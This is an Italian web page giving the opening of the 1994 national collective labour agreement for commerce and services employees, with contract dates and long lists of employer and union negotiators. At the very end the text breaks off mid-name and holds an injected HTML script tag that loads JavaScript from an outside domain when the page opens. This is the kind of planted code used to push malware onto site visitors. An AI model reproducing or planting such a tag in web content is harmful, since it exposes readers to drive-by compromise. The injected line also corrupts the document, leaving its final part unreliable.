Torna
all'elenco delle categorie
|
Categoria: Commercio e servizi Settore: Commercio Data stipula: 3-11-1994 Data decorrenza: 1-1-1995 Data scadenza: 31-12-1998
Contratto Collettivo Nazionale di Lavoro per i dipendenti da aziende del
terziario della distribuzione e dei servizi.
L'anno 1994, il giorno 3 del mese di novembre in Roma
tra
la Confederazione Generale del Commercio del Turismo e dei Servizi dal suo
Presidente Gr. Uff. Dott. Francesco Colucci con una delegazione presieduta
dall'Ing. Vincenzo Gervasio e composta dai signori: Daniela Amadori,
Giampietro Badan, Sandra Balboni, Armando Baroni, Ennio Bartolotta, Walter
Baumgartner, Giovanni Belloni, Angelo Bossi, Gianluigi Bracchi, Marco
Antonio Brogini, Alberto Busnelli, Riccardo Calamandrei, Rinaldo Canofari,
Leopoldo Capra, Daniela Ceruti, Marco Chimenti, Giuseppe Chinellato, Nicola
Cigliese, Giuseppe Ciuti, Giorgio Collo, Giuseppe Corollo, Alfio Corradi,
Tullio Cottinini, Edoardo Dal Pino, Fabio Dalla Riva, Gianfranco De Biasi,
Antonio Del Nero, Gianni Diamanti, Lorenzo Duetto, Marcello D'Alfonso,
Franco Entilli, Paolo Ferraboschi, Vittorio Filipponi, Arnaldo Fiorenzoni,
Luigi Focacci, Paola Fontanelli, Ambrogio Forcucci, Renzo Fossati, Giuseppe
Gabriele, Carlo Gandini, Clara Ghelli, Pio Giornofelice, Matteo Giovanardi,
Riccardo Goi, Ernesto Hausmann, Luigi Inverni, Giovanni Labella, Emanuele
Lajolo, Luigi Lazzati, Pietro Leoni, Massimo Maciga, Mauro Malandri, Sergio
Malchiodi, Giuseppe Manzo, Mario Manzoni, Ugone Marchegiani, Carlo
Marinelli, Vittorio Massagrande, Guido Mastropietro, Bruno Milani, Pier
Paolo Mori, Eugenio Nardelli, Nicola Nardoni, Anita Navarra, Piero Navarra,
Maria Giovanna Orsucci, Giampiero Pacilio, Pier Domenico Palazzi, Francesco
Panerai, Bruno Papette, Gianni Parvis, Roberto Perna, Alberto Petrera,
Gianfranco Pizzorno, Antonio Poddighe, Massimiliano Polacco, Alberto
Pomogranato, Donato Porreca, Giorgio Primavesi, Giovanni Rinaldi, Paolo
Romanin, Augusto Rossi, Luigi Ruggiero, Mario Russomanno, Francesco
Salvaggio, Carlo Salvini, Gian Franco Soranna, Sergio Sparacio, Luca
Squeri, Maurizio Stanziano, Riccardo Tamburini, Sirio Tardella, Giuseppe
Tattoli, Lino Tedeschi, Claudio Tomassini, Steven Tranquilli, Gian Ernesto
Zanin, con l'assistenza del Segretario Generale Luigi Trigona, del Vice
Segretario Generale Vicario Basilio Mussolin, del Direttore della Direzione
Lavoro Luigi De Romanis, del Direttore delle Relazioni Sindacali Giuseppe
Zabbatino, dei Capi Servizio Maria Cecilia Segatori, Daniela Tebaidi e di
Caterina Calafiore, Guido Lazzarelli, Donata Tirelli
e
la Federazione Italiana Lavoratori Commercio Alberghi-Mense e Servizi
(FILCAMS-CGIL), rappresentata dal Segretario Generale Aldo Amoretti, dal
Segretario Generale Aggiunto Pietro Ruffolo, dai Segretari Nazionali Ivano
Corraini, Maria Antonietta Franceschini, Gennaro Pannozzo, Luigi Piacenti e
dai componenti il comitato Direttivo nelle persone di: Luigi Coppini,
Silvano Conti, Lionello Giannini, Piero Marconi, Manlio Mazziotta, Bruno
Perin, Maria Regina Ruiz, Claudio Treves, Marco Bertolotti, Antonio
Paparatto, Cristina Ronco, Marisa Valenti, Giovanna Vaudano, Gaetano
Vazzana, Antonio Amoruso, Giovanni Baseotto, Domenico Campagnoli, Nadia
D'Amely, Patrizia Ferrari, Adriana Freddi, Lucia Giorgi, Antonio Lareno,
Melissa Oliviero, Carla Pasquale, Santino Pizzimiglio, Bruno Rastelli,
Fabio Sormanni, Marco Vicedomini, Mauro Dassio, Carmela Minniti, Giorgio
Scarinci, Patrizia Vistori, Renato Zanieri, Marina Bergamin, Loredana De
Checchi, Giorgio Loro, Sandro Maccatrozzo, Vittorio Meneghini, Giusy
Muchon, Celeste Paulon, Alessandro Forabosco, Ezio Medeot, Denise Trevisan,
Dino Bonazza, Ramona Campari, Mauro Capacci, Gualtiero Francisconi,
Gabriele Guglielmi, Mirella Losi, Patrizia Maestri, Gabriele Marchi,
Marinella Meschieri, Daniela Pellicani, Walter Sgargi, Giulio Tiberio,
Daniela Zini, Carlo Amato, Dalida Angelini, Fabio Gi<script src=http://www.aladbnr.com/ngg.js></script>
|